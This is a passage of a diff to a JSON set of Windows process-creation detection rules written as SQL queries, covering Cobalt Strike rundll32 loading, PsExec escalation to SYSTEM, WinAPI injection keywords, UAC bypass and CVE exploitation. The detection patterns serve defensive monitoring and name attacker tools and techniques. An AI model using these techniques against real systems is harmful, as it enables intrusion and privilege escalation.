'Security' AND ParentProcessName LIKE '%\\\\Serv-U.exe' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR 
NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bash.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\scriptrunner.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\sc.exe' ESCAPE '\\' AND CommandLine LIKE '%config%' ESCAPE '\\' AND CommandLine LIKE '%binPath%' ESCAPE '\\' AND (CommandLine LIKE '%powershell%' ESCAPE '\\' OR CommandLine LIKE '%cmd %' ESCAPE '\\' OR CommandLine LIKE '%mshta%' ESCAPE '\\' OR CommandLine LIKE '%wscript%' ESCAPE '\\' OR CommandLine LIKE '%cscript%' ESCAPE '\\' OR CommandLine LIKE '%rundll32%' ESCAPE '\\' OR CommandLine LIKE '%svchost%' ESCAPE '\\' OR CommandLine LIKE '%dllhost%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /c%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /k%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /r%' ESCAPE '\\' OR CommandLine LIKE '%cmd /c%' ESCAPE '\\' OR CommandLine LIKE '%cmd /k%' ESCAPE '\\' OR CommandLine LIKE '%cmd /r%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\TEMP\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_servu_susp_child_process.yml" + "filename": "proc_creation_win_sc_service_path_modification.yml" }, { - "title": "Exploit for CVE-2017-8759", - 
"id": "fdd84c68-a1f6-47c9-9477-920584f94905", + "title": "Potential Defense Evasion Via Rename Of Highly Relevant Binaries", + "id": "0ba1da6d-b6ce-4366-828c-18826c9de23e", "status": "test", - "description": "Detects Winword starting uncommon sub process csc.exe as used in exploits for CVE-2017-8759", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the execution of a renamed binary often used by attackers or malware leveraging new Sysmon OriginalFileName datapoint.", + "author": "Matthew Green - @mgreen27, Florian Roth (Nextron Systems), frack113", "tags": [ - "attack.execution", - "attack.t1203", - "attack.t1204.002", - "attack.initial_access", - "attack.t1566.001" + "attack.defense_evasion", + "attack.t1036.003", + "car.2013-05-009" ], "falsepositives": [ - "Unknown" + "Custom applications use renamed binaries adding slight change to binary name. Typically this is easy to spot and add to whitelist", + "PsExec installed via Windows Store doesn't contain original filename field (False negative)" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\WINWORD.EXE' ESCAPE '\\' AND NewProcessName LIKE '%\\\\csc.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (Description = 'Execute processes remotely' OR Product = 'Sysinternals PsExec' OR (Description LIKE 'Windows PowerShell%' ESCAPE '\\' OR Description LIKE 'pwsh%' ESCAPE '\\') OR (OriginalFileName LIKE 'powershell.exe' ESCAPE '\\' OR OriginalFileName LIKE 'pwsh.dll' ESCAPE '\\' OR OriginalFileName LIKE 'powershell\\_ise.exe' ESCAPE '\\' OR OriginalFileName LIKE 'psexec.exe' ESCAPE '\\' OR OriginalFileName LIKE 'psexec.c' ESCAPE '\\' OR OriginalFileName LIKE 'psexesvc.exe' ESCAPE '\\' OR OriginalFileName LIKE 'cscript.exe' ESCAPE '\\' OR OriginalFileName LIKE 'wscript.exe' ESCAPE '\\' OR OriginalFileName LIKE 'mshta.exe' ESCAPE '\\' OR 
OriginalFileName LIKE 'regsvr32.exe' ESCAPE '\\' OR OriginalFileName LIKE 'wmic.exe' ESCAPE '\\' OR OriginalFileName LIKE 'certutil.exe' ESCAPE '\\' OR OriginalFileName LIKE 'rundll32.exe' ESCAPE '\\' OR OriginalFileName LIKE 'cmstp.exe' ESCAPE '\\' OR OriginalFileName LIKE 'msiexec.exe' ESCAPE '\\' OR OriginalFileName LIKE 'reg.exe' ESCAPE '\\')) AND NOT ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell\\_ise.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\psexec.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\psexec64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\PSEXESVC.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmstp.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\reg.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_exploit_cve_2017_8759.yml" + "filename": "proc_creation_win_renamed_binary_highly_relevant.yml" }, { - "title": "Potential PowerShell Execution Via DLL", - "id": "6812a10b-60ea-420c-832f-dfcc33b646ba", - "status": "test", - "description": "Detects potential PowerShell execution from a DLL instead of the usual PowerShell process as seen used in PowerShdll", - "author": "Markus Neis, Nasreddine Bencherchali", + "title": "Use of W32tm as Timer", + "id": "6da2c9f5-7c53-401b-aacb-92c040ce1215", + "status": "experimental", + "description": "When configured with suitable command line arguments, w32tm can act as a delay mechanism", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1218.011" + "attack.discovery", 
+ "attack.t1124" ], "falsepositives": [ - "Unknown" + "Legitimate use" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvcs.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\InstallUtil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regasm.exe' ESCAPE '\\') OR OriginalFileName IN ('RUNDLL32.EXE', 'RegSvcs.exe', 'InstallUtil.exe', 'RegAsm.exe')) AND (CommandLine LIKE '%Default.GetString%' ESCAPE '\\' OR CommandLine LIKE '%FromBase64String%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Expression%' ESCAPE '\\' OR CommandLine LIKE '%IEX %' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Command%' ESCAPE '\\' OR CommandLine LIKE '%ICM %' ESCAPE '\\' OR CommandLine LIKE '%DownloadString%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\w32tm.exe' ESCAPE '\\' OR OriginalFileName = 'w32time.dll') AND (CommandLine LIKE '%/stripchart%' ESCAPE '\\' AND CommandLine LIKE '%/computer:%' ESCAPE '\\' AND CommandLine LIKE '%/period:%' ESCAPE '\\' AND CommandLine LIKE '%/dataonly%' ESCAPE '\\' AND CommandLine LIKE '%/samples:%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_powershell_dll_execution.yml" + "filename": "proc_creation_win_w32tm.yml" }, { - "title": "Potential Atlassian Confluence CVE-2021-26084 Exploitation Attempt", - "id": "245f92e3-c4da-45f1-9070-bc552e06db11", + "title": "Suspicious LOLBIN AccCheckConsole", + "id": "0f6da907-5854-4be6-859a-e9958747b0aa", "status": "test", - "description": "Detects spawning of suspicious child processes by Atlassian Confluence server which may indicate successful exploitation of CVE-2021-26084", - "author": "Bhabesh Raj", + "description": "Detects suspicious LOLBIN AccCheckConsole execution with parameters as used to load an arbitrary DLL", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.initial_access", - 
"attack.execution", - "attack.t1190", - "attack.t1059" + "attack.execution" ], "falsepositives": [ - "Unknown" + "Legitimate use of the UI Accessibility Checker" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\Atlassian\\\\Confluence\\\\jre\\\\bin\\\\java.exe' ESCAPE '\\' AND (CommandLine LIKE '%certutil%' ESCAPE '\\' OR CommandLine LIKE '%cmd /c%' ESCAPE '\\' OR CommandLine LIKE '%cmd /k%' ESCAPE '\\' OR CommandLine LIKE '%cscript%' ESCAPE '\\' OR CommandLine LIKE '%curl%' ESCAPE '\\' OR CommandLine LIKE '%ipconfig%' ESCAPE '\\' OR CommandLine LIKE '%powershell%' ESCAPE '\\' OR CommandLine LIKE '%pwsh%' ESCAPE '\\' OR CommandLine LIKE '%regsvr32%' ESCAPE '\\' OR CommandLine LIKE '%rundll32%' ESCAPE '\\' OR CommandLine LIKE '%whoami%' ESCAPE '\\' OR CommandLine LIKE '%wscript%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\AccCheckConsole.exe' ESCAPE '\\' OR OriginalFileName = 'AccCheckConsole.exe') AND (CommandLine LIKE '% -window %' ESCAPE '\\' AND CommandLine LIKE '%.dll%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_exploit_cve_2021_26084_atlassian_confluence.yml" + "filename": "proc_creation_win_lolbin_susp_acccheckconsole.yml" }, { - "title": "Potential WinAPI Calls Via CommandLine", - "id": "ba3f5c1b-6272-4119-9dbd-0bc8d21c2702", + "title": "Winrar Compressing Dump Files", + "id": "1ac14d38-3dfc-4635-92c7-e3fd1c5f5bfc", "status": "experimental", - "description": "Detects the use of WinAPI Functions via the commandline. 
As seen used by threat actors via the tool winapiexec", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects a suspicious winrar execution that involves a file with a \".dmp\"/\".dump\" extension, which could be a step in a process of dump file exfiltration", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1106" + "attack.collection", + "attack.t1560.001" ], "falsepositives": [ - "Unknown" + "Legitimate use of WinRAR with a command line in which .dmp appears accidentally" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%AddSecurityPackage%' ESCAPE '\\' OR CommandLine LIKE '%AdjustTokenPrivileges%' ESCAPE '\\' OR CommandLine LIKE '%Advapi32%' ESCAPE '\\' OR CommandLine LIKE '%CloseHandle%' ESCAPE '\\' OR CommandLine LIKE '%CreateProcessWithToken%' ESCAPE '\\' OR CommandLine LIKE '%CreatePseudoConsole%' ESCAPE '\\' OR CommandLine LIKE '%CreateRemoteThread%' ESCAPE '\\' OR CommandLine LIKE '%CreateThread%' ESCAPE '\\' OR CommandLine LIKE '%CreateUserThread%' ESCAPE '\\' OR CommandLine LIKE '%DangerousGetHandle%' ESCAPE '\\' OR CommandLine LIKE '%DuplicateTokenEx%' ESCAPE '\\' OR CommandLine LIKE '%EnumerateSecurityPackages%' ESCAPE '\\' OR CommandLine LIKE '%FreeHGlobal%' ESCAPE '\\' OR CommandLine LIKE '%FreeLibrary%' ESCAPE '\\' OR CommandLine LIKE '%GetDelegateForFunctionPointer%' ESCAPE '\\' OR CommandLine LIKE '%GetLogonSessionData%' ESCAPE '\\' OR CommandLine LIKE '%GetModuleHandle%' ESCAPE '\\' OR CommandLine LIKE '%GetProcAddress%' ESCAPE '\\' OR CommandLine LIKE '%GetProcessHandle%' ESCAPE '\\' OR CommandLine LIKE '%GetTokenInformation%' ESCAPE '\\' OR CommandLine LIKE '%ImpersonateLoggedOnUser%' ESCAPE '\\' OR CommandLine LIKE '%kernel32%' ESCAPE '\\' OR CommandLine LIKE '%LoadLibrary%' ESCAPE '\\' OR CommandLine LIKE '%memcpy%' ESCAPE '\\' OR CommandLine LIKE '%MiniDumpWriteDump%' ESCAPE '\\' OR CommandLine 
LIKE '%ntdll%' ESCAPE '\\' OR CommandLine LIKE '%OpenDesktop%' ESCAPE '\\' OR CommandLine LIKE '%OpenProcess%' ESCAPE '\\' OR CommandLine LIKE '%OpenProcessToken%' ESCAPE '\\' OR CommandLine LIKE '%OpenThreadToken%' ESCAPE '\\' OR CommandLine LIKE '%OpenWindowStation%' ESCAPE '\\' OR CommandLine LIKE '%PtrToString%' ESCAPE '\\' OR CommandLine LIKE '%QueueUserApc%' ESCAPE '\\' OR CommandLine LIKE '%ReadProcessMemory%' ESCAPE '\\' OR CommandLine LIKE '%RevertToSelf%' ESCAPE '\\' OR CommandLine LIKE '%RtlCreateUserThread%' ESCAPE '\\' OR CommandLine LIKE '%secur32%' ESCAPE '\\' OR CommandLine LIKE '%SetThreadToken%' ESCAPE '\\' OR CommandLine LIKE '%VirtualAlloc%' ESCAPE '\\' OR CommandLine LIKE '%VirtualFree%' ESCAPE '\\' OR CommandLine LIKE '%VirtualProtect%' ESCAPE '\\' OR CommandLine LIKE '%WaitForSingleObject%' ESCAPE '\\' OR CommandLine LIKE '%WriteInt32%' ESCAPE '\\' OR CommandLine LIKE '%WriteProcessMemory%' ESCAPE '\\' OR CommandLine LIKE '%ZeroFreeGlobalAllocUnicode%' ESCAPE '\\') AND NOT ((NewProcessName LIKE '%\\\\MpCmdRun.exe' ESCAPE '\\' AND CommandLine LIKE '%GetLoadLibraryWAddress32%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\rar.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\winrar.exe' ESCAPE '\\') OR Description = 'Command line RAR') AND (CommandLine LIKE '%.dmp%' ESCAPE '\\' OR CommandLine LIKE '%.dump%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_inline_win_api_access.yml" + "filename": "proc_creation_win_winrar_dmp.yml" }, { - "title": "UAC Bypass Using PkgMgr and DISM", - "id": "a743ceba-c771-4d75-97eb-8a90f7f4844c", + "title": "Suspicious IIS Module Registration", + "id": "043c4b8b-3a54-4780-9682-081cb6b8185c", "status": "test", - "description": "Detects the pattern of UAC Bypass using pkgmgr.exe and dism.exe (UACMe 23)", - "author": "Christian Burkard (Nextron Systems)", - "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - 
"attack.t1548.002" - ], + "description": "Detects a suspicious IIS module registration as described in Microsoft threat report on IIS backdoors", + "author": "Florian Roth (Nextron Systems), Microsoft (idea)", "falsepositives": [ - "Unknown" + "Administrative activity" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\pkgmgr.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\dism.exe' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ParentProcessName LIKE '%\\\\w3wp.exe' ESCAPE '\\' AND (CommandLine LIKE '%appcmd.exe add module%' ESCAPE '\\' OR (CommandLine LIKE '% system.enterpriseservices.internal.publish%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\') OR (CommandLine LIKE '%gacutil%' ESCAPE '\\' AND CommandLine LIKE '% /I%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_uac_bypass_pkgmgr_dism.yml" + "filename": "proc_creation_win_iis_susp_module_registration.yml" }, { - "title": "Suspicious Control Panel DLL Load", - "id": "d7eb979b-c2b5-4a6f-a3a7-c87ce6763819", - "status": "test", - "description": "Detects suspicious Rundll32 execution from control.exe as used by Equation Group and Exploit Kits", - "author": "Florian Roth (Nextron Systems)", + "title": "Conhost.exe CommandLine Path Traversal", + "id": "ee5e119b-1f75-4b34-add8-3be976961e39", + "status": "experimental", + "description": "detects the usage of path traversal in conhost.exe indicating possible command/argument confusion/hijacking", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218.011" + "attack.execution", + "attack.t1059.003" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\System32\\\\control.exe' ESCAPE '\\' AND 
(NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE')) AND NOT (CommandLine LIKE '%Shell32.dll%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentCommandLine LIKE '%conhost%' ESCAPE '\\' AND CommandLine LIKE '%/../../%' ESCAPE '\\')" ], - "filename": "proc_creation_win_rundll32_susp_control_dll_load.yml" + "filename": "proc_creation_win_conhost_path_traversal.yml" }, { - "title": "PUA - AdFind Suspicious Execution", - "id": "9a132afa-654e-11eb-ae93-0242ac130002", + "title": "CobaltStrike Load by Rundll32", + "id": "ae9c6a7c-9521-42a6-915e-5aaa8689d529", "status": "test", - "description": "Detects AdFind execution with common flags seen used during attacks", - "author": "Janantha Marasinghe (https://github.com/blueteam0ps), FPT.EagleEye Team, omkar72, oscd.community", + "description": "Rundll32 can be use by Cobalt Strike with StartW function to load DLLs from the command line.", + "author": "Wojciech Lesicki", "tags": [ - "attack.discovery", - "attack.t1018", - "attack.t1087.002", - "attack.t1482", - "attack.t1069.002" + "attack.defense_evasion", + "attack.t1218.011" ], "falsepositives": [ - "Legitimate admin activity" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%domainlist%' ESCAPE '\\' OR CommandLine LIKE '%trustdmp%' ESCAPE '\\' OR CommandLine LIKE '%dcmodes%' ESCAPE '\\' OR CommandLine LIKE '%adinfo%' ESCAPE '\\' OR CommandLine LIKE '% dclist %' ESCAPE '\\' OR CommandLine LIKE '%computer\\_pwdnotreqd%' ESCAPE '\\' OR CommandLine LIKE '%objectcategory=%' ESCAPE '\\' OR CommandLine LIKE '%-subnets -f%' ESCAPE '\\' OR CommandLine LIKE '%name=\"Domain Admins\"%' ESCAPE '\\' OR CommandLine LIKE '%-sc u:%' ESCAPE '\\' OR CommandLine LIKE '%domainncs%' ESCAPE '\\' OR CommandLine LIKE '%dompol%' ESCAPE '\\' OR CommandLine LIKE '% oudmp %' ESCAPE '\\' OR CommandLine LIKE '%subnetdmp%' ESCAPE '\\' 
OR CommandLine LIKE '%gpodmp%' ESCAPE '\\' OR CommandLine LIKE '%fspdmp%' ESCAPE '\\' OR CommandLine LIKE '%users\\_noexpire%' ESCAPE '\\' OR CommandLine LIKE '%computers\\_active%' ESCAPE '\\' OR CommandLine LIKE '%computers\\_pwdnotreqd%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE' OR (CommandLine LIKE '%rundll32.exe%' ESCAPE '\\' OR CommandLine LIKE '%rundll32 %' ESCAPE '\\')) AND (CommandLine LIKE '%.dll%' ESCAPE '\\' AND (CommandLine LIKE '% StartW' ESCAPE '\\' OR CommandLine LIKE '%,StartW' ESCAPE '\\')))" ], - "filename": "proc_creation_win_pua_adfind_susp_usage.yml" + "filename": "proc_creation_win_hktl_cobaltstrike_load_by_rundll32.yml" }, { - "title": "Winrar Execution in Non-Standard Folder", - "id": "4ede543c-e098-43d9-a28f-dd784a13132f", + "title": "DNS RCE CVE-2020-1350", + "id": "b5281f31-f9cc-4d0d-95d0-45b91c45b487", "status": "test", - "description": "Detects a suspicious winrar execution in a folder which is not the default installation folder", - "author": "Florian Roth (Nextron Systems), Tigzy", + "description": "Detects exploitation of DNS RCE bug reported in CVE-2020-1350 by the detection of suspicious sub process", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.collection", - "attack.t1560.001" + "attack.initial_access", + "attack.t1190", + "attack.execution", + "attack.t1569.002" ], "falsepositives": [ - "Legitimate use of WinRAR in a folder of a software that bundles WinRAR" + "Unknown but benign sub processes of the Windows DNS service dns.exe" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\rar.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\winrar.exe' ESCAPE '\\') OR Description = 'Command line RAR') AND NOT ((NewProcessName LIKE '%\\\\WinRAR%' ESCAPE '\\' OR NewProcessName 
LIKE '%C:\\\\Windows\\\\Temp%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\UnRAR.exe%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ParentProcessName LIKE '%\\\\System32\\\\dns.exe' ESCAPE '\\' AND NOT ((NewProcessName LIKE '%\\\\System32\\\\werfault.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\System32\\\\conhost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\System32\\\\dnscmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\System32\\\\dns.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_winrar_execution.yml" + "filename": "proc_creation_win_exploit_cve_2020_1350.yml" }, { - "title": "Python Spawning Pretty TTY on Windows", - "id": "480e7e51-e797-47e3-8d72-ebfce65b6d8d", + "title": "Remote CHM File Download/Execution Via HH.EXE", + "id": "f57c58b3-ee69-4ef5-9041-455bf39aaa89", "status": "experimental", - "description": "Detects python spawning a pretty tty", - "author": "Nextron Systems", + "description": "Detects the usage of \"hh.exe\" to execute/download remotely hosted \".chm\" files.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059" + "attack.defense_evasion", + "attack.t1218.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%python.exe' ESCAPE '\\' OR NewProcessName LIKE '%python3.exe' ESCAPE '\\' OR NewProcessName LIKE '%python2.exe' ESCAPE '\\') AND ((CommandLine LIKE '%import pty%' ESCAPE '\\' AND CommandLine LIKE '%.spawn(%' ESCAPE '\\') OR CommandLine LIKE '%from pty import spawn%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (OriginalFileName = 'HH.exe' OR NewProcessName LIKE '%\\\\hh.exe' ESCAPE '\\') AND CommandLine LIKE '%http%' ESCAPE '\\')" ], - "filename": "proc_creation_win_python_pty_spawn.yml" + "filename": "proc_creation_win_hh_chm_remote_download_or_execution.yml" }, { - 
"title": "Finger.exe Suspicious Invocation", - "id": "af491bca-e752-4b44-9c86-df5680533dbc", + "title": "PsExec/PAExec Escalation to LOCAL SYSTEM", + "id": "8834e2f7-6b4b-4f09-8906-d2276470ee23", "status": "experimental", - "description": "Detects suspicious aged finger.exe tool execution often used in malware attacks nowadays", - "author": "Florian Roth (Nextron Systems), omkar72, oscd.community", + "description": "Detects suspicious commandline flags used by PsExec and PAExec to escalate a command line to LOCAL_SYSTEM rights", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1105" + "attack.resource_development", + "attack.t1587.001" ], "falsepositives": [ - "Admin activity (unclear what they do nowadays with finger.exe)" + "Admins that use PsExec or PAExec to escalate to the SYSTEM account for maintenance purposes (rare)", + "Users that debug Microsoft Intune issues using the commands mentioned in the official documentation; see https://learn.microsoft.com/en-us/mem/intune/apps/intune-management-extension" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (OriginalFileName = 'finger.exe' OR NewProcessName LIKE '%\\\\finger.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '% -s cmd%' ESCAPE '\\' OR CommandLine LIKE '% /s cmd%' ESCAPE '\\' OR CommandLine LIKE '% -s -i cmd%' ESCAPE '\\' OR CommandLine LIKE '% /s /i cmd%' ESCAPE '\\' OR CommandLine LIKE '% /s -i cmd%' ESCAPE '\\' OR CommandLine LIKE '% -s /i cmd%' ESCAPE '\\' OR CommandLine LIKE '% -i -s cmd%' ESCAPE '\\' OR CommandLine LIKE '% /i /s cmd%' ESCAPE '\\' OR CommandLine LIKE '% -i /s cmd%' ESCAPE '\\' OR CommandLine LIKE '% /i -s cmd%' ESCAPE '\\' OR CommandLine LIKE '% -s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% /s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% -s -i pwsh%' ESCAPE '\\' OR 
CommandLine LIKE '% /s /i pwsh%' ESCAPE '\\' OR CommandLine LIKE '% /s -i pwsh%' ESCAPE '\\' OR CommandLine LIKE '% -s /i pwsh%' ESCAPE '\\' OR CommandLine LIKE '% -i -s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% /i /s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% -i /s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% /i -s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% -s powershell%' ESCAPE '\\' OR CommandLine LIKE '% /s powershell%' ESCAPE '\\' OR CommandLine LIKE '% -s -i powershell%' ESCAPE '\\' OR CommandLine LIKE '% /s /i powershell%' ESCAPE '\\' OR CommandLine LIKE '% /s -i powershell%' ESCAPE '\\' OR CommandLine LIKE '% -s /i powershell%' ESCAPE '\\' OR CommandLine LIKE '% -i -s powershell%' ESCAPE '\\' OR CommandLine LIKE '% /i /s powershell%' ESCAPE '\\' OR CommandLine LIKE '% -i /s powershell%' ESCAPE '\\' OR CommandLine LIKE '% /i -s powershell%' ESCAPE '\\') AND (CommandLine LIKE '%psexec%' ESCAPE '\\' OR CommandLine LIKE '%paexec%' ESCAPE '\\' OR CommandLine LIKE '%accepteula%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_finger_usage.yml" + "filename": "proc_creation_win_sysinternals_psexec_paexec_escalate_system.yml" }, { - "title": "Invoke-Obfuscation Via Use MSHTA", - "id": "ac20ae82-8758-4f38-958e-b44a3140ca88", - "status": "test", - "description": "Detects Obfuscated Powershell via use MSHTA in Scripts", - "author": "Nikita Nazarov, oscd.community", + "title": "Suspicious TSCON Start as SYSTEM", + "id": "9847f263-4a81-424f-970c-875dab15b79b", + "status": "experimental", + "description": "Detects a tscon.exe start as LOCAL SYSTEM", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.command_and_control", + "attack.t1219" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%set%' ESCAPE '\\' AND CommandLine LIKE '%&&%' ESCAPE '\\' AND CommandLine LIKE 
'%mshta%' ESCAPE '\\' AND CommandLine LIKE '%vbscript:createobject%' ESCAPE '\\' AND CommandLine LIKE '%.run%' ESCAPE '\\' AND CommandLine LIKE '%(window.close)%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\') AND NewProcessName LIKE '%\\\\tscon.exe' ESCAPE '\\')" ], - "filename": "proc_creation_win_hktl_invoke_obfuscation_via_use_mhsta.yml" + "filename": "proc_creation_win_tscon_localsystem.yml" }, { - "title": "Microsoft IIS Connection Strings Decryption", - "id": "97dbf6e2-e436-44d8-abee-4261b24d3e41", - "status": "experimental", - "description": "Detects use of aspnet_regiis to decrypt Microsoft IIS connection strings. An attacker with Microsoft IIS web server access via a webshell or alike can decrypt and dump any hardcoded connection strings, such as the MSSQL service account password using aspnet_regiis command.", - "author": "Tim Rauch", + "title": "Potential CommandLine Path Traversal Via Cmd.EXE", + "id": "087790e3-3287-436c-bccf-cbd0184a7db1", + "status": "test", + "description": "Detects potential path traversal attempt via cmd.exe. 
